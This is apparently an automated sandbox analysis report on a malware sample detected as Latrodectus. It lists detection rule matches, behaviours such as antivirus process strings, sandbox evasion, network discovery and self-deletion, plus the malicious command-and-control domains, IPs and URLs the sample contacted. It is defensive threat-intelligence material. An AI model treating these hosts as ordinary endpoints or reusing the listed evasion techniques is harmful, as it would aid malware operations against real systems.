Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018006A304 GetSystemTimeAsFileTime, 3_2_000000018006A304
Source: C:\Windows\System32\rundll32.exe Code function: 4_2_00000203431C8AE0 GetUserNameA,wsprintfA, 4_2_00000203431C8AE0
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180040CB0 GetVersionExW,memset,SHGetValueW,atoi,GetVersion,GetModuleHandleW,GetProcAddress, 3_2_0000000180040CB0
Source: C:\Windows\System32\nltest.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
AV process strings found (often used to terminate AV products)
Source: Amcache.hve.8.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.8.dr Binary or memory string: msmpeng.exe
Source: Amcache.hve.8.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: rundll32.exe Binary or memory string: 360tray.exe
Source: rundll32.exe Binary or memory string: SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\App Paths\360safe.exe
Source: rundll32.exe Binary or memory string: SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\360safe.exe
Source: Amcache.hve.8.dr Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information
barindex
Yara detected Latrodectus
Source: Yara match File source: 3.2.rundll32.exe.26c61e20000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.rundll32.exe.20342fe0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.rundll32.exe.20342fe0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.rundll32.exe.203431c0000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.22380120000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.rundll32.exe.26c61e20000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.rundll32.exe.26c61e10000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.rundll32.exe.203431c0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.22380130000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.22380120000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.22380130000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.rundll32.exe.26c61e10000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000009.00000002.3284037566.0000022380120000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2040445129.0000020342FE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.2909305037.0000022381EB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2040526568.00000203431C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.3283619847.000000A88ED78000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.2979519134.0000022380230000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.3110926112.0000022380230000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.2158647911.0000026C61E20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.3284079772.0000022380130000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.3284387768.0000022381EB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.2856557891.0000022380230000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.2158630473.0000026C61E10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 2928, type: MEMORYSTR
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected Latrodectus
Source: Yara match File source: 3.2.rundll32.exe.26c61e20000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.rundll32.exe.20342fe0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.rundll32.exe.20342fe0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.rundll32.exe.203431c0000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.22380120000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.rundll32.exe.26c61e20000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.rundll32.exe.26c61e10000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.rundll32.exe.203431c0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.22380130000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.22380120000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.22380130000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.rundll32.exe.26c61e10000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000009.00000002.3284037566.0000022380120000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2040445129.0000020342FE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.2909305037.0000022381EB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2040526568.00000203431C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.3283619847.000000A88ED78000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.2979519134.0000022380230000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.3110926112.0000022380230000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.2158647911.0000026C61E20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.3284079772.0000022380130000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.3284387768.0000022381EB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.2856557891.0000022380230000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.2158630473.0000026C61E10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 2928, type: MEMORYSTR
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1431883 Sample: 360total.dll.exe Startdate: 25/04/2024 Architecture: WINDOWS Score: 100 67 jarinamaers.shop 2->67 69 grizmotras.com 2->69 77 Found malware configuration 2->77 79 Yara detected Latrodectus 2->79 81 Sample uses string decryption to hide its real strings 2->81 83 2 other signatures 2->83 12 loaddll64.exe 1 2->12         started        signatures3 process4 process5 14 cmd.exe 1 12->14         started        17 rundll32.exe 12->17         started        19 conhost.exe 12->19         started        21 2 other processes 12->21 signatures6 91 Uses ipconfig to lookup or modify the Windows network settings 14->91 93 Performs a network lookup / discovery via net view 14->93 23 rundll32.exe 2 14->23         started        95 Contains functionality to compare user and computer (likely to detect sandboxes) 17->95 97 Contains functionality to detect sleep reduction / modifications 17->97 27 WerFault.exe 20 16 17->27         started        29 WerFault.exe 4 16 17->29         started        process7 file8 65 C:\Users\user\AppData\...\Update_79066994.dll, PE32+ 23->65 dropped 87 Deletes itself after installation 23->87 31 rundll32.exe 13 23->31         started        signatures9 process10 dnsIp11 71 jarinamaers.shop 172.67.136.103, 443, 49726, 49727 CLOUDFLARENETUS United States 31->71 73 grizmotras.com 172.67.219.28, 443, 49730 CLOUDFLARENETUS United States 31->73 75 System process connects to network (likely due to code injection or exploit) 31->75 35 cmd.exe 1 31->35         started        37 cmd.exe 1 31->37         started        40 cmd.exe 1 31->40         started        42 2 other processes 31->42 signatures12 process13 signatures14 44 systeminfo.exe 2 1 35->44         started        47 conhost.exe 35->47         started        85 Performs a network lookup / discovery via net view 37->85 49 conhost.exe 37->49         started        51 net.exe 1 37->51         started        53 conhost.exe 40->53         started        55 ipconfig.exe 1 40->55         started        57 conhost.exe 42->57         started        59 conhost.exe 42->59         started        61 2 other processes 42->61 process15 signatures16 89 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 44->89 63 WmiPrvSE.exe 44->63         started        process17
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
172.67.136.103
 jarinamaers.shop United States
13335 CLOUDFLARENETUS true
172.67.219.28
 grizmotras.com United States
13335 CLOUDFLARENETUS true

Contacted Domains

Name IP Active
jarinamaers.shop 172.67.136.103 true
grizmotras.com 172.67.219.28 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://wrankaget.site/live/ true
  • Avira URL Cloud: safe
 unknown
https://grizmotras.com/live/ true
  • Avira URL Cloud: safe
 unknown
https://jarinamaers.shop/live/ true
  • Avira URL Cloud: safe
 unknown